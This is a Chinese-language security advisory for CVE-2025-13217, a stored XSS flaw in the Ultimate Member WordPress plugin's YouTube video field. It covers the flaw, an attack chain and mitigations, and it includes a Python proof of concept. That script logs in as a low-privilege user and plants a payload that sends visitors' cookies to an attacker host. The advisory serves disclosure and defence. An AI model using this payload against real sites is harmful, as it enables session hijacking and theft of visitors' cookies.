CVE-2025-13217 WordPress Ultimate Member插件YouTube视频字段存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13217

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ultimate Member WordPress插件（User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin）

漏洞概述

CVE-2025-13217是WordPress平台下Ultimate Member插件的一个存储型跨站脚本（Stored XSS）安全漏洞。该插件是WordPress生态中流行的用户档案、注册、登录、会员目录和内容限制管理插件。漏洞源于`um_profile_field_filter_hook__youtube_video()`函数对用户提供的YouTube视频URL缺乏足够的输入清理和输出转义。攻击者可利用此漏洞在YouTube视频的"value"字段中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在数据库中，当其他用户访问包含该YouTube视频字段的个人资料页面时，恶意代码会自动执行。攻击者只需拥有订阅者（Subscriber）级别的账户权限即可实施攻击，这使得漏洞利用门槛相对较低，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。

技术细节

漏洞存在于Ultimate Member插件的`includes/core/um-filters-fields.php`文件第80行附近的`um_profile_field_filter_hook__youtube_video()`函数中。该函数负责处理和显示用户资料中的YouTube视频字段，但未对用户输入的YouTube视频URL进行适当的HTML实体转义或输入验证。攻击者可以在YouTube视频URL字段中注入包含JavaScript事件处理器的代码，例如在URL中嵌入`javascript:`协议或使用事件属性如`onerror`、`onload`等。当受害用户访问攻击者的个人资料页面时，浏览器会解析并执行这些恶意脚本。由于该插件的会员目录功能会展示用户信息，攻击范围可能波及所有访问该用户档案的访问者。CVSS 3.1评分6.4（AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N）表明攻击复杂度低、权限要求低，但影响范围覆盖整个站点。

攻击链分析

STEP 1

步骤1

攻击者注册WordPress账户并获取订阅者（Subscriber）级别权限

STEP 2

步骤2

攻击者访问个人资料编辑页面，在YouTube视频字段中注入恶意XSS payload

STEP 3

步骤3

恶意脚本被存储到数据库中，由于插件未正确转义输出，payload被永久保存

STEP 4

步骤4

当其他用户（如管理员或普通会员）访问攻击者的个人资料页面或会员目录时，浏览器解析并执行注入的JavaScript代码

STEP 5

步骤5

攻击者通过JavaScript实现会话劫持、窃取Cookies、重定向用户或进行钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-13217 PoC - Ultimate Member YouTube Video Stored XSS
# Target: WordPress site with Ultimate Member plugin <= 2.11.0

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def login():
    """Authenticate with WordPress to obtain session cookies"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/"
    }
    resp = session.post(login_url, data=login_data)
    return session if 'wordpress_logged_in' in session.cookies.get_dict() else None

def exploit_xss(session):
    """Inject malicious JavaScript via YouTube video field"""
    # XSS payload - cookie stealing example
    xss_payload = '<img src=x onerror="fetch(`https://attacker.com/log?c=`+document.cookie)">'
    
    # Update profile with XSS payload in YouTube video field
    profile_url = f"{TARGET_URL}/um-api/um_users/update/?hash=YOUR_NONCE_HASH"
    profile_data = {
        'youtube_video': xss_payload,
        'user_id': 'ATTACKER_USER_ID'
    }
    resp = session.post(profile_url, json=profile_data)
    return resp.status_code == 200

def main():
    print("[*] CVE-2025-13217 Ultimate Member Stored XSS PoC")
    session = login()
    if session:
        print("[+] Login successful")
        if exploit_xss(session):
            print("[+] XSS payload injected successfully")
            print("[*] Visit target profile page to trigger the payload")
    else:
        print("[-] Login failed")

if __name__ == "__main__":
    main()

影响范围

Ultimate Member插件 2.11.0及之前所有版本

防御指南

临时缓解措施

如果无法立即升级插件，可临时采取以下措施：在Web应用防火墙（WAF）中添加针对XSS特征的规则过滤；禁用或限制YouTube视频字段功能的使用；通过.htaccess或Nginx配置添加额外的HTTP安全响应头；定期审查用户资料字段内容，排查潜在的恶意脚本代码。